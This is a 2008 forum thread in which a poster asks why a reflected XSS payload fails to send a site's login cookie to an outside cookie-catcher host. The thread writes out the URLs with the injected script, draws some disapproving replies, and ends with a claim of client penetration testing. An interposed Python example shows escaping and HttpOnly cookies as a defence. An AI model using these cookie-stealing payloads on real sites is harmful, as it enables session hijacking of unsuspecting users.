Stiofan Posted April 20, 2008

Hi All, I have a problem with a site that seems vulnerable to XSS!

[tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]

The above will display the details of the login cookie. However, I can't get the following to work:

[tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]

Won't work! I've tried converting it to HEX etc. Nothing seems to work. Am I doing something wrong, or are there security features in modern browsers that prevent this?

When I view the HTML source, however, I notice something interesting:

[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]

It would appear to have filtered out the plus (+) symbol? When I type the URL:

[tt]www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script>[/tt]

into my browser and hit go, I get a JavaScript error. It says it expected a semicolon. I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem. Is there anything else I can do?

Thanks, S.
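The post above describes a reflected XSS sink (a query parameter echoed into the page) and a "+" that disappears from the reflected script. The following is an added example, not code from the thread or from the site in question: a hypothetical Python model of a topic.php-style handler that shows why the plus vanishes (a standard query-string parser decodes "+" as a space, which is URL decoding, not a security filter), shows the unescaped reflection beside its fixed form, and shows the HttpOnly cookie attribute that keeps the session cookie out of document.cookie even if a reflection is missed. All function names and the sample URL are assumptions for illustration.

```python
"""Added example (not the site's code): reflected-XSS sink, its fix, and
cookie hardening, modelled on a hypothetical topic.php-style handler."""
import html
from urllib.parse import parse_qs, urlsplit


def topic_name_from_url(url: str) -> str:
    """Extract topic_name the way a typical web stack does.

    parse_qs percent-decodes and turns '+' into a space. That is ordinary
    URL decoding, not a defence: a defender must not rely on it, because
    it changes nothing about the <script> tags that are reflected intact.
    """
    query = parse_qs(urlsplit(url).query)
    return query.get("topic_name", [""])[0]


def render_vulnerable(topic_name: str) -> str:
    """The bug from the thread: parameter dropped into HTML unescaped."""
    return f"<h1>Help topic: {topic_name}</h1>"


def render_fixed(topic_name: str) -> str:
    """Fix for the HTML-text context: entity-encode the untrusted value.

    html.escape with quote=True also encodes quotes, so the same helper is
    safe inside attribute values that are themselves quoted.
    """
    return f"<h1>Help topic: {html.escape(topic_name, quote=True)}</h1>"


def session_cookie_header(name: str, value: str) -> str:
    """Defence in depth for the cookie itself.

    HttpOnly makes the cookie invisible to document.cookie, so a script
    that does slip through cannot read it; Secure keeps it off plain HTTP;
    SameSite=Lax limits cross-site sending.
    """
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax"


def contains_script_tag(rendered_html: str) -> bool:
    """Crude detection check used by the demo and test: did a raw <script
    tag survive into the rendered page?"""
    return "<script" in rendered_html.lower()


# Constructed sample input shaped like the thread's first URL.
SAMPLE_URL = (
    "http://www.site.com/help/topic.php?&topic_name="
    "<script>alert(document.cookie)</script>"
)

if __name__ == "__main__":
    name = topic_name_from_url(SAMPLE_URL)
    print("reflected raw  :", render_vulnerable(name))
    print("reflected fixed:", render_fixed(name))
    print(session_cookie_header("sid", "example-session-id"))
```

The comparison worth keeping in mind for a client report: the decoding of "+" is incidental and gives no protection, so the finding is a real reflected XSS regardless of whether a particular payload fired; the remediation is contextual output encoding at the sink, with HttpOnly on the session cookie as a second layer.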
Deveant Posted April 20, 2008

It's possible it filtered a number of things, but either way, you started this topic the wrong way: you said that you're attacking someone else's website, and this is a no-no. So simply I will say that the site you are attacking isn't so vulnerable after all. Quite easily the web host may be filtering out "http://www.mycookiecatcher.com" in the address. This is easily done. I suggest a new method of attack.

"I have a problem with a site that seems vulnerable to XSS!"

There are hundreds upon thousands of sites vulnerable to an XSS attack; you just gotta know how to find 'em, and what styles of XSS attacks you can do.
K1u Posted April 20, 2008

Here bro - http://www.criticalsecurity.net/index.php?showtopic=7137 enjoy.
moonlit Posted April 20, 2008

I'd rhetorically question why I bother, but I'm not sure that'd be particularly productive. I'll just sigh instead.
Stiofan (Author) Posted April 24, 2008

Apologies, I probably should've added that I'm penetration testing for a client.